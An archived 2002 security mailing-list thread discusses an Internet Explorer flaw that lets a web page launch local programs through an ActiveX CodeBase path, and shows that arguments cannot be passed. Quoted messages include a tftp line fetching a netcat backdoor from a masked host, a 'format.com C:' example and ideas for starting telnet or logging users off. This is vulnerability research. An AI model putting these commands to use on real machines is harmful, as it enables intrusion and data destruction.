RE: Rather large MSIE-hole
From: Ryan Sweat (h3xm3@swbell.net)Date: 03/14/02
- Previous message: Brett Moore: "RE: idq.dll problem??"
- In reply to: Slow2Show: "Re: Rather large MSIE-hole"
- Next in thread: Keegan: "Re: Rather large MSIE-hole"
- Next in thread: Eric V Brown: "Re: Rather large MSIE-hole"
- Reply: Keegan: "Re: Rather large MSIE-hole"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: "Ryan Sweat" <h3xm3@swbell.net> To: "'Slow2Show'" <sl2sho@yahoo.com>, <vuln-dev@securityfocus.com> Date: Thu, 14 Mar 2002 12:36:45 -0600
The parameter you insert, ie: 'c:/winnt/system32/calc.exe', is
transformed into an ActiveX control in C:\WINDOWS\Downloaded Program
Files. If you view the properties of the control file it creates, you
will notice that the parameter is listed as the "CodeBase". In this
example it would be file://c:\windows\system32\calc.exe. I don't
believe it is possible to supply an argument here as it will only accept
a complete path and filename with no white spaces.
The ideal exploit would be the ability to inject code onto the user's
computer and have it run without supplying arguments. Georgi Guninski
has described methods of accomplishing this, however it involves
Temporary Internet Files and the path to that directory will change
depending on which user is logged in.
http://www.guninski.com/parsedat-desc.html
-ryan
-----Original Message-----
From: Slow2Show [mailto:sl2sho@yahoo.com]
Sent: Thursday, March 14, 2002 3:30 AM
To: vuln-dev@securityfocus.com
Subject: Re: Rather large MSIE-hole
In-Reply-To: <20020313125115.A14918@castleblack.darkflame.net>
>I havent tried, since i don't run MS, how about ?
>var programName=new Array(
>'c:/winnt/system32/tftp.exe -i xxx.xxx.xxx.xxx GET
ncx99.exe',
>'c:/winnt/system32/ncx99.exe');
I tried you idea nocon...it seems that the codebase
will not let you pass any parameters...
so 'C:/WINDOWS/system32/calc.exe' will work
but 'c:/winnt/system32/tftp.exe -i xxx.xxx.xxx.xxx GET
ncx99.exe' will not because of the parameters
I've researched getting this to work by using unicode
chars to see if there was something that you could
put in to bypass this...but alas it wont work.note that
spaces are allowed in the directory path, but not after
the program name.
so this would work:
'C:/Program Files/intern~1/IEXPLORER.exe'
but these wont:
'C:/Program Files/intern~1/IEXPLORER.exe -k'
'C:/WINDOWS/system32/format.com C:'
//pseudo code...showing the concept of how I tried
every Unicode char
for(i=0;i<65535;i++)
$= unicodeCharAt(i)
'C:/Program Files/intern~/IEXPLORER.exe$-k'
The only possible attack vector I can see from this is
if you had prior knowledge to the path of a program
on a system that you wanted to execute. This is
slightly dangerous if you are running as admin
because the telnet server could be started by
launching
%SYSTEMROOT%\system32\tlntsess.exe
But you would still need a valid user/pass to gain
access.(and you should be slapped if you are web
browsing as admin)
I'm glad this hole turned out to be relatively benign...
this would have turned into a really dangerous hole
and not just an annoying one if parameters could be
passed.
But don't forget that script kiddies could "boot" you
by executing logoff.exe/tsshutdn.exe/tsdiscon.exe/
if anybody else finds a way of getting the parameters
to work....please post to the list.
lata,
-Slow2Show-
University of Florida
p.s. see ya @ SANS2002...party Florida style!!
- Previous message: Brett Moore: "RE: idq.dll problem??"
- In reply to: Slow2Show: "Re: Rather large MSIE-hole"
- Next in thread: Keegan: "Re: Rather large MSIE-hole"
- Next in thread: Eric V Brown: "Re: Rather large MSIE-hole"
- Reply: Keegan: "Re: Rather large MSIE-hole"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
